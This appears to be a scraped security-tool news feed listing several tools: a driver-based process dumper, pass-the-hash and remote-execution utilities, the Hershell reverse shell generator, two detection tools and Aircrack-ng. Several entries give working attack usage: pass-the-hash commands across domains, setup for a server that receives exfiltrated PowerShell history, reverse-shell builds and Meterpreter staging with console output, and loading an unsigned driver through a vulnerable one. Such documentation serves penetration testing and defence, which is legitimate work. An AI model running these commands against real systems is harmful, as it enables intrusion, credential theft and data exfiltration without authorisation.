  • Copy the folder libyara/include/python into your_rep/libyara/include
  • At the end of libyara/modules/module_list add ``` MODULE(safe)
  • Modify libyara/Makefile.am:
    • after the line:
    libyara_la_LDFLAGS = -version-number 3:8:1
    • add:
    libyara_la_LDFLAGS += -LPATH_TO_PYTHON3.*_LIB -lpython3.*m -ljansson 
  • Compile! `


KsDumper - Dumping Processes Using The Power Of Kernel Space

$
0
0

I always had an interest in reverse engineering. A few days ago I wanted to look at some game internals for fun, but it was packed & protected by EAC (EasyAntiCheat). This means its handle were stripped and I was unable to dump the process from Ring3. I decided to try to make a custom driver that would allow me to copy the process memory without using OpenProcess. I knew nothing about Windows kernel, PE file structure, so I spent a lot of time reading articles and forums to make this project.

Features
  • Dump any process main module using a kernel driver (both x86 and x64)
  • Rebuild PE32/PE64 header and sections
  • Works on protected system processes & processes with stripped handles (anti-cheats)
Note: Import table isn't rebuilt.

Usage
Before using KsDumperClient, the KsDumper driver needs to be loaded.
It is unsigned so you need to load it however you want. I'm using drvmap for Win10. Everything is provided in this release if you want to use it aswell.
  • Run Driver/LoadCapcom.bat as Admin. Don't press any key or close the window yet !
  • Run Driver/LoadUnsignedDriver.bat as Admin.
  • Press enter in the LoadCapcom cmd to unload the driver.
  • Run KsDumperClient.exe.
  • Profit !
Note: The driver stays loaded until you reboot, so if you close KsDumperClient.exe, you can just reopen it !
Note2: Even though it can dump both x86 & x64 processes, this has to run on x64 Windows.

References

Compile Yourself
  • Requires Visual Studio 2017
  • Requires Windows Driver Kit (WDK)
  • Requires .NET 4.6.1


SharpStat - C# Utility That Uses WMI To Run "cmd.exe /c netstat -n", Save The Output To A File, Then Use SMB To Read And Delete The File Remotely

$
0
0

C# utility that uses WMI to run "cmd.exe /c netstat -n", save the output to a file, then use SMB to read and delete the file remotely

Description
This script will attempt to connect to all the supplied computers and use WMI to execute cmd.exe /c netstat -n > <file>. The file the output is saved to is specified by '-file'. Once the netstat command is running, the output is read via remote SMB call and then deleted.
While this isn't the stealthiest of scripts (because of the cmd.exe execution and saving to a file), sometimes you gotta do what you gotta do. An alternative would be to use WMI to remotely query netstat information, but that WMI class is only available on Win10+ systems, which isn't ideal. This solution at least works for all levels of operating systems.

Usage
 Mandatory Options:
-file = This is the file that the output will be saved in
temporarily before being remotely read/deleted

Optional Options:
-computers = A list of systems to run this against, separated by commas
[or]
-dc = A domain controller to get a list of domain computers from
-domain = The domain to get a list of domain computers from

Examples
     SharpStat.exe -file "C:\Users\Public\test.txt" -domain lab.raikia.com -dc lab.raikia.com
SharpStat.exe -file "C:\Users\Public\test.txt" -computers "wkstn7.lab.raikia.com,wkstn10.lab.raikia.com"

Contact
If you have questions or issues, hit me up at raikiasec@gmail.com or @raikiasec


Check-LocalAdminHash - A PowerShell Tool That Attempts To Authenticate To Multiple Hosts Over Either WMI Or SMB Using A Password Hash To Determine If The Provided Credential Is A Local Administrator

$
0
0
Check-LocalAdminHash is a PowerShell tool that attempts to authenticate to multiple hosts over either WMI or SMB using a password hash to determine if the provided credential is a local administrator. It's useful if you obtain a password hash for a user and want to see where they are local admin on a network. It is essentially a Frankenstein of two of my favorite tools along with some of my own code. It utilizes Kevin Robertson's (@kevin_robertson) Invoke-TheHash project for the credential checking portion. Additionally, the script utilizes modules from PowerView by Will Schroeder (@harmj0y) and Matt Graeber (@mattifestation) to enumerate domain computers to find targets for testing adm in access against.


The reason this script even exists is because on an assessment I wanted to gather all the PowerShell console history files (PSReadline) from every system on the network. The PSReadline console history is essentially the PowerShell version of bash history. It can include so many interesting things that people type into their terminals including passwords. So, included in this script is an option to exfiltrate all the PSReadline files as well. There is a bit of setup for this. See the end of the Readme for setup.

For more info read the blog here: https://www.blackhillsinfosec.com/check-localadminhash-exfiltrating-all-powershell-history/

Examples

Checking Local Admin Hash Against All Hosts Over WMI
This command will use the domain 'testdomain.local' to lookup all systems and then attempt to authenticate to each one using the user 'testdomain.local\PossibleAdminUser' and a password hash over WMI.
Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems

Exfiltrate All PSReadline Console History Files
This command will use the domain 'testdomain.local' to lookup all systems and then attempt to authenticate to each one using the user 'testdomain.local\PossibleAdminUser' and a password hash over WMI. It then attempts to locate PowerShell console history files (PSReadline) for each profile on every system and then POST's them to a web server. See the bottom of the Readme for server setup.
Check-LocalAdminHash -Domain testdomain.local -UserDomain testdomain.local -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -AllSystems -ExfilPSReadline

Using A CIDR Range
This command will use the provided CIDR range to generate a target list and then attempt to authenticate to each one using the local user 'PossibleAdminUser' and a password hash over WMI.
Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -CIDR 192.168.1.0/24

Using Target List and SMB and Output to File
This command will use the provided targetlist and attempt to authenticate to each host using the local user 'PossibleAdminUser' and a password hash over SMB.
Check-LocalAdminHash -Username PossibleAdminUser -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -TargetList C:\temp\targetlist.txt -Protocol SMB | Out-File -Encoding Ascii C:\temp\local-admin-systems.txt

Single Target
This command attempts to perform a local authentication for the user Administrator against the system 192.168.0.16 over SMB.
Check-LocalAdminHash -TargetSystem 192.168.0.16 -Username Administrator -PasswordHash E62830DAED8DBEA4ACD0B99D682946BB -Protocol SMB

Check-LocalAdminHash Options
Username - The Username for attempting authentication.
PasswordHash - Password hash of the user.
TargetSystem - Single hostname or IP for authentication attempt.
TargetList - A list of hosts to scan one per line
AllSystems - A switch that when enabled utilizes PowerView modules to enumerate all domain systems. This list is then used to check local admin access.
Domain - This is the domain that PowerView will utilize for discovering systems.
UserDomain - This is the user's domain to authenticate to each system with. Don't use this flag if using a local cred instead of domain cred.
Protocol - This is the setting for whether to check the hash using WMI or SMB. Default is 'WMI' but set it to 'SMB' to check that instead.
CIDR - Specify a CIDR form network range such as 192.168.0.0/24
Threads - Defaults to 5 threads. (I've run into some odd issues setting threads more than 15 with some results not coming back.)
ExfilPSReadline - For each s ystem where auth is successful it runs a PowerShell command to locate PSReadLine console history files (PowerShell command history) and then POSTS them to a web server. See the Readme for server setup.

PSReadline Exfiltration Setup
This is your warning that you are about to setup an Internet-facing server that will accept file uploads. Typically, this is a very bad thing to do. So definitely take precautions when doing this. I would recommend locking down firewall rules so that only the IP that will be uploading PSReadline files can hit the web server. Also, while we are on the topic of security, this will work just fine with an HTTPS connection so setup your domain and cert so that the PSReadline files are sent encrypted over the network. You have been warned...
  • Setup a server wherever you would like the files to be sent. This server must be reachable over HTTP/HTTPS from each system.
  • Copy the index.php script from this repo and put it in /index.php in the web root (/var/www/html) on your web server.
  • Make an uploads directory
mkdir /var/www/html/uploads
  • Modify the permissions of this directory
chmod 0777 /var/www/html/uploads
  • Make sure php is installed
apt-get install php
  • Restart Apache
service apache2 restart
  • In the Check-LocalAdminHash.ps1 script itself scroll down to the "Gen-EncodedUploadScript" function and modify the "$Url" variable right under "$UnencodedCommand". Point it at your web server index.php page. I haven't figured out how to pass the UploadUrl variable into that section of the code that ends up getting encoded and run on target systems so hardcode it for now.
Now when you run Check-LocalAdminHash with the -ExfilPSReadline flag it should attempt to POST each PSReadline (if there are any) to your webserver.


Credits
Check-LocalAdminHash is pretty much a Frankenstein of two of my favorite tools, PowerView and Invoke-TheHash. 95% of the code is from those two tools. So the credit goes to Kevin Robertson (@kevin_robertson) for Invoke-TheHash, and credit goes to Will Schroeder (@harmj0y), Matt Graeber (@mattifestation) (and anyone else who worked on PowerView). Without those two tools this script wouldn't exist. Also shoutout to Steve Borosh (@424f424f) for help with the threading and just being an all around awesome dude.
Invoke-TheHash - https://github.com/Kevin-Robertson/Invoke-TheHash
PowerView - https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1


Hershell - Multiplatform Reverse Shell Generator

$
0
0

Simple TCP reverse shell written in Go.
It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.
Supported OS are:
  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Why ?
Although meterpreter payloads are great, they are sometimes spotted by AV products.
The goal of this project is to get a simple reverse shell, which can work on multiple systems.

How ?
Since it's written in Go, you can cross compile the source for the desired architecture.

Getting started & dependencies
As this is a Go project, you will need to follow the official documentation to set up your Golang environment (with the $GOPATH environment variable).
Then, just run go get github.com/lesnuages/hershell to fetch the project.

Building the payload
To simplify things, you can use the provided Makefile. You can set the following environment variables:
  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port
For the GOOS and GOARCH variables, you can get the allowed values here.
However, some helper targets are available in the Makefile:
  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos32 : builds a mac os 32 bits executable (Mach-O)
  • macos64 : builds a mac os 64 bits executable (Mach-O)
For those targets, you just need to set the LHOST and LPORT environment variables.

Using the shell
Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.
The following special commands are supported:
  • run_shell : drops you an system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Usage
First of all, you will need to generate a valid certificate:
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For windows:
# Predifined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
For Linux:
# Predifined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.0.12 LPORT=1234

Examples

Basic usage
One can use various tools to handle incomming connections, such as:
  • socat
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)
Here is an example with ncat:
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter staging
WARNING: this currently only work for the Windows platform.
The meterpreter staging currently supports the following payloads :
  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https
To use the correct one, just specify the transport you want to use (tcp, http, https)
To use the meterpreter staging feature, just start your handler:
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.1 6.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
Then, in hershell, use the meterpreter command:
[hershell]> meterpreter https 172.16.122.105:8443
A new meterpreter session should pop in msfconsole:
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A 172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/ handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

Credits
@khast3x for the Dockerfile feature


AgentSmith-HIDS - Open Source Host-based Intrusion Detection System (HIDS)

$
0
0

Technically, AgentSmith-HIDS is not a Host-based Intrusion Detection System (HIDS) due to lack of rule engine and detection function. However, it can be used as a high performance 'Host Information Collect Agent' as part of your own HIDS solution. The comprehensiveness of information which can be collected by this agent was one of the most important metrics during developing this project, hence it was built to function in the kernel stack and achieve huge advantage comparing to those function in user stack, such as:
  • Better performance, Information needed are collected in kernel stack to avoid additional supplement actions such as traversal of '/proc'; and to enhance the performance of data transportation, data collected is transferred via shared ram instead of netlink.
  • Hard to be bypassed, Information collection was powered by specifically designed kernel drive, makes it almost impossible to bypass the detection for malicious software like rootkit, which can deliberately hide themselves.
  • Easy to be integrated,The AgentSmith-HIDS was built to integrate with other applications and can be used not only as security tool but also a good monitoring tool, or even a good detector of your assets. The agent is capable of collecting the users, files, processes and internet connections for you, so let's imagine when you integrate it with CMDB, you could get a comprehensive map consists of your network, host, container and business (even dependencies). What if you also have a Database audit tool at hand? The map can be extended to contain the relationship between your DB, DB User, tables, fields, applications, network, host and containers etc. Thinking of the possibility of integration with network intrusion detection system and/or threat intelligence etc., higher traceability could also be achieved. It just never gets old.
  • Kernel stack + User stack,AgentSmith-HIDS also provide user stack module, to further extend the functionality when working with kernel stack module.

Major abilities of AgentSmith-HIDS:
  • Kernel stack module hooks execve, connect, process inject, create file, DNS query, load LKM behaviors via Kprobe,and is also capable of monitoring containers by being compatible with Linux namespace.
  • User stack module utilize built in detection functions including queries of User ListListening ports listSystem RPM listSchedule jobs
  • AntiRootkit,From: Tyton ,for now add PROC_FILE_HOOKSYSCALL_HOOKLKM_HIDDENINTERRUPTS_HOOK feature,but only wark on Kernel > 3.10.
  • Cred Change monitoring (sudo/su/sshd except)

About the compatibility with Kernel version
  • Kernel > 2.6.25
  • AntiRootKit > 3.10

About the compatibility with Containers
SourceNodename
Hosthostname
Dockercontainer name
k8spod name

Composition of AgentSmith-HIDS
  • Kernel stack module (LKM) Hook key functions via Kprobe to capture information needed.
  • User stack module Collect data capatured by kernel stack module, perform necessary process and send it to Kafka; Keep sending heartbeat packet to server so process integrity can be identitied; Execute commands received from server.
  • Agent Server(Optional) Send commands to user stack module and monitoring the status of user stack module.

Execve Hook
Achieved by hooking sys_execve()/sys_execveat(), example:
{
"uid":"0",
"data_type":"59",
"run_path":"/root/AgentSmith-HIDS/agent/target/release",
"exe":"/usr/bin/ls",
"argv":"ls --color=auto --indicator-style=classify ",
"pid":"6265",
"ppid":"1941",
"pgid":"6265",
"tgid":"6265",
"comm":"fish",
"nodename":"test",
"stdin":"/dev/pts/0",
"stdout":"/dev/pts/0",
"sessionid":"1",
"user":"root",
"time":"1575721900051",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"a0c32dd6d3bc4d364380e2e65fe9ac64"
}

Connect Hook
Achieved by hooking sys_connect(), example:
{
"uid":"0",
"data_type":"42",
"sa_family":"4",
"fd":"4",
"dport":"1025",
"dip":"180.101.49.11",
"exe":"/usr/bin/ping",
"pid":"6294",
"ppid":"1941",
"pgid":"6294",
"tgid":"6294",
"comm":"ping",
"nodename":"test",
"sip":"192.168.165.153",
"sport":"45524",
"res":"0",
"sessionid":"1",
"user":"root",
"time":"1575721921240",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"735ae70b4ceb8707acc40bc5a3d06e04"
}

DNS Query Hook
Achieved by hooking sys_recvfrom(), example:
{
"uid":"0",
"data_type":"601",
"sa_family":"4",
"fd":"4",
"sport":"53",
"sip":"192.168.165.2",
"exe":"/usr/bin/ping",
"pid":"6294",
"ppid":"1941",
"pgid":"6294",
"tgid":"6294",
"comm":"ping",
"nodename":"test",
"dip":"192.168.165.153",
"dport":"53178",
"qr":"1",
"opcode":"0",
"rcode":"0",
"query":"www.baidu.com",
"sessionid":"1",
"user":"root",
"time":"1575721921240",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"39c45487a85e26ce5755a893f7e88293"
}

Create File Hook
Achieved by hooking security_inode_create(), example:
{
"uid":"0",
"data_type":"602",
"exe":"/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.232.b09-0.el7_7.x86_64/jre/bin/java",
"file_path":"/tmp/kafka-logs/replication-offset-checkpoint.tmp",
"pid":"3341",
"ppid":"1",
"pgid":"2657",
"tgid":"2659",
"comm":"kafka-scheduler",
"nodename":"test",
"sessionid":"3",
"user":"root",
"time":"1575721984257",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"215be70a38c3a2e14e09d637c85d5311",
"create_file_md5":"d41d8cd98f00b204e9800998ecf8427e"
}

Process Inject Hook
Achieved by hooking sys_ptrace(), example:
{
"uid":"0",
"data_type":"101",
"ptrace_request":"4",
"target_pid":"7402",
"addr":"00007ffe13011ee6",
"data":"-a",
"exe":"/root/ptrace/ptrace",
"pid":"7401",
"ppid":"1941",
"pgid":"7401",
"tgid":"7401",
"comm":"ptrace",
"nodename":"test",
"sessionid":"1",
"user":"root",
"time":"1575722717065",
"local_ip":"192.168.165.153",
"hostname":"test",
"exe_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

Load LKM File Hook
Achieved by hooking load_module(), example:
{
"uid":"0",
"data_type":"603",
"exe":"/usr/bin/kmod",
"lkm_file":"/root/ptrace/ptrace",
"pid":"29461",
"ppid":"9766",
"pgid":"29461",
"tgid":"29461",
"comm":"insmod",
"nodename":"test",
"sessionid":"13",
"user":"root",
"time":"1577212873791",
"local_ip":"192.168.165.152",
"hostname":"test",
"exe_md5":"0010433ab9105d666b044779f36d6d1e",
"load_file_md5":"863293f9fcf1af7afe5797a4b6b7aa0a"
}

Cred Change Hook
Achieved by Hook commit_creds(),example:
{
"uid":"0",
"data_type":"604",
"exe":"/tmp/tt",
"pid":"27737",
"ppid":"26865",
"pgid":"27737",
"tgid":"27737",
"comm":"tt",
"old_uid":"1000",
"nodename":"test",
"sessionid":"42",
"user":"root",
"time":"1578396197131",
"local_ip":"192.168.165.152",
"hostname":"test",
"exe_md5":"d99a695d2dc4b5099383f30964689c55"
}

PROC File Hook Alert
{
"uid":"-1",
"data_type":"700",
"module_name":"autoipv6",
"hidden":"0",
"time":"1578384987766",
"local_ip":"192.168.165.152",
"hostname":"test"
}

Syscall Hook Alert
{
"uid":"-1",
"data_type":"701",
"module_name":"diamorphine",
"hidden":"1",
"syscall_number":"78",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

LKM Hidden Alert
{
"uid":"-1",
"data_type":"702",
"module_name":"diamorphine",
"hidden":"1",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

Interrupts Hook Alert
{
"uid":"-1",
"data_type":"703",
"module_name":"syshook",
"hidden":"1",
"interrupt_number":"2",
"time":"1578384927606",
"local_ip":"192.168.165.152",
"hostname":"test"
}

About Performance of AgentSmith-HIDS
Testing Environment:
CPUIntel(R) Core(TM) i7-4870HQ CPU @ 2.50GHz 2 Core
RAM2GB
OS/KernelCentos7 / 3.10.0-1062.7.1.el7.x86_64
Testing Result:
Hook HandlerAverage Delay(us)
execve_entry_handler10.4
connect_handler7.5
connect_entry_handler0.06
recvfrom_handler9.2
recvfrom_entry_handler0.17
fsnotify_post_handler0.07
Original Testing Data:
Benchmark Data

Documents for deployment and testing purpose:
Quick Start

Special Thanks(Not in order)
yuzunzhi
hapood
HF-Daniel

Memhunter - Live Hunting Of Code Injection Techniques

$
0
0

Memhunter is an endpoint sensor tool that is specialized in detecing resident malware, improving the threat hunter analysis process and remediation times. The tool detects and reports memory-resident malware living on endpoint processes. Memhunter detects known malicious memory injection techniques. The detection process is performed through live analysis and without needing memory dumps. The tool was designed as a replacement of memory forensic volatility plugins such as malfind and hollowfind. The idea of not requiring memory dumps helps on performing the memory resident malware threat hunting at scale, without manual analysis, and without the complex infrastructure needed to move dumps to forensic environments.

The detection process is performed through a combination of endpoint data collection and memory inspection scanners. The tool is a standalone binary that, upon execution, deploys itself as a windows service. Once running as a service, memhunter starts the collection of ETW events that might indicate code injection attacks. The live stream of collected data events is feed into memory inspection scanners that use detection heuristics to down select the potential attacks. The entire detection process does not require human intervention, neither memory dumps, and it can be performed by the tool itself at scale.

Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called "minjector" that contains +15 code injection techniques. The minjector tool cannot onlybe used to exercise memhunter detections, but also as a one-stop location to learn on well-known code injection techniques out there.
Architecture deck available here

Example 1: Manual run to exercise detection of reflective DLL injection



Example 2: Manual run to exercise detection of process hollowing injection




Aircrack-ng 1.6 - Complete Suite Of Tools To Assess WiFi Network Security

$
0
0

Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).
All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

It's been more than a year since the last release, and this one brings a ton of improvements.

The most noticeable change are the rate display in Airodump-ng. Previously, it went up to 54Mbit. Now, it takes into account the complexity of 802.11n/ac and calculates the maximum rate that can be achieved on the AP. Expect 802.11ax rates in the next release. We brought basic UTF-8 support for ESSID and if you ever come across WPA3 or OWE, this will be displayed correctly as well. Airodump-ng has had the ability to read PCAP files for quite some time, which can be handy to generate one of the CSV/netxml or other output formats available. However, signal levels were not displayed; this has now been fixed. A new option has been added to read the files in realtime, instead of reading all at once.

Huge improvements have been done under the hood as well. Code has been cleaned up, deduplicated (Pull Request 2010), reorganized (Pull Request 2032), which lead to a lot of fixes.

This reorganization also updated the build system, which now requires automake 1.14+. This was a problem on CentOS 7, but we provide a script to install these requirements from source to solve the issue; although automake 1.14 (and other dependencies) have been released 6+ years ago, CentOS is the only distribution that doesn't have it, and it was decided to provide a script to install the requirements was a small price to pay to improve and simplify the build system.

Other tools received fixes as well:
  • Along with a few fixes, Airmon-ng now handles more network managers, and persistent ones; no need to run airmon-ng check kill a few times for the network managers that keep restarting.
  • Airdecap-ng can now decrypt both sides of the conversation when WDS is in use.
  • As usual, we updated WPE patches for freeradius and HostAPd.
  • Python 2 is dead as of January 1st, and now all our scripts support Python 3. If you are still running Python 2, don't worry, they are still backward compatible.
  • Aircrack-ng contains fixes for a few crashes and other regressions, as well as improved CPU detection in some cases (-u option).

We have been working on our infrastructure and have a buildbot server with quite a few systems. If you head up to our buildbot landing page, you can see the extent of the build system: 14 systems to test build on top of AppVeyor, TravisCI, and Coverity Scan, plus one to automatically package it and upload packages to packagecloud.io. It gets triggered every time we push code to our GitHub repository and you can see the details of each build for each commit on GitHub. We have an earlier blog post where you can find some details of our CI/CD.
We are currently working on bringing Mac infrastructure as well.

We keep working on our automated tests, and a few have been added; this release also brings integration tests (16 for now) to automatically test different features of airodump-ng, aireplay-ng, airbase-ng and others.

In case you find security issues in Aircrack-ng or our domains, we recently added a security policy to explain how to report them. It is on GitHub, on our website, as well as security.txt.

And finally, what you've been waiting for, the full changelog:
  • Aircrack-ng: Added support for MidnightBSD
  • Aircrack-ng: Fixed ARM processors display with -u
  • Aircrack-ng: Fixed AVX-512F support
  • Aircrack-ng: Fixed cracking speed calculation
  • Aircrack-ng: Fixed cracking WEP beyond 10k IVS
  • Aircrack-ng: Fixed creating new session and added test case
  • Aircrack-ng: Fixed encryption display in some cases when prompting for network to crack
  • Aircrack-ng: Fixed exiting Aircrack-ng in some cases
  • Aircrack-ng: Fixed logical and physical processor count detection
  • Aircrack-ng: Fixed PMKID length check
  • Aircrack-ng: Various fixes and improvements to WPA cracking engine and its performance
  • Airdecap-ng: Decrypt both directions when WDS is in use
  • Airdecap-ng: Fixed decrypting WPA PCAP when BSSID changes
  • Airgraph-ng: Added support for WPA3
  • Airgraph-ng: Switch to argparse
  • Airmon-ng: Added detection for wicd, Intel Wireless Daemon (iwd), net_applet
  • Airmon-ng: Handle case when avahi keeps getting restarted
  • Airmon-ng: Indicates when interface doesn't exist
  • Airodump-ng: Added autocolorization interactive key
  • Airodump-ng: Added option to read PCAP in realtime (-T)
  • Airodump-ng: Added PMKID detection
  • Airodump-ng: Added support for GMAC
  • Airodump-ng: Added support for WPA3 and OWE (Enhanced Open)
  • Airodump-ng: Basic UTF-8 support
  • Airodump-ng: Checked management frames are complete before processing IE to avoid switch from WEP to WPA
  • Airodump-ng: Display signal when reading from PCAP
  • Airodump-ng: Fixed netxml output with hidden SSID
  • Airodump-ng: Improved rates calculation for 802.11n/ac
  • Airtun-ng: Fixed using -p with -e
  • Autoconf: Fixed order of ssl and crypto libraries
  • dcrack: Fixed client reporting benchmark
  • dcrack: Now handles chunked encoding when communicating (default in Python3)
  • Freeradius-WPE: Updated patch for v3.0.20
  • General: Added NetBSD endianness support
  • General: Added python3 support to scripts
  • General: Added script to update autotools on CentOS 7
  • General: Added security policy to report security issues
  • General: Reorganizing filesystem layout (See PR 2032), and switch to automake 1.14+
  • General: Convert to non-recursive make (part of PR 2032)
  • General: Deduplicating functions and code cleanups
  • General: Fixed packaging on cygwin due to openssl library name change
  • General: Fixed SPARC build on Solaris 11
  • General: Removed coveralls.io
  • General: Updated dependencies in README.md/INSTALLING
  • General: Use upstream radiotap libary, as a sub-tree
  • General: various fixes and improvements (code, CI, integration tests, coverity)
  • HostAPd-WPE: Updated for v2.9
  • Manpages: Fixes and improvements
  • Tests: Added Integration tests for aireplay-ng, airodump-ng, aircrack-ng, airbase-ng, and others
  • Tests: Added tests for airdecap-ng, aircrack-ng

Building

Requirements
  • Autoconf
  • Automake
  • Libtool
  • shtool
  • OpenSSL development package or libgcrypt development package.
  • Airmon-ng (Linux) requires ethtool.
  • On windows, cygwin has to be used and it also requires w32api package.
  • On Windows, if using clang, libiconv and libiconv-devel
  • Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.
  • pkg-config (pkgconf on FreeBSD)
  • FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
  • Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

Optional stuff
  • If you want SSID filtering with regular expression in airodump-ng (-essid-regex) pcre development package is required.
  • If you want to use airolib-ng and '-r' option in aircrack-ng, SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
  • If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.
  • In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng, libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above)
  • For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
  • rfkill
  • If you want Airodump-ng to log GPS coordinates, gpsd is needed
  • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
  • CMocka for unit testing
  • For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

Installing required and optional dependencies
Below are instructions for installing the basic requirements to build aircrack-ng for a number of operating systems.
Note: CMocka, tcpdump, screen, HostAPd and WPA Supplicant should not be dependencies when packaging Aircrack-ng.

Linux

Debian/Ubuntu
sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

Fedora/CentOS/RHEL
sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel git make file expect hostapd wpa_supplicant iw usbutils tcpdump screen
Note: on CentOS and RedHat, HostAPd requires 'epel' repository to be enabled: sudo yum install epel-release

openSUSE
sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc

Mageia
sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc make

Alpine
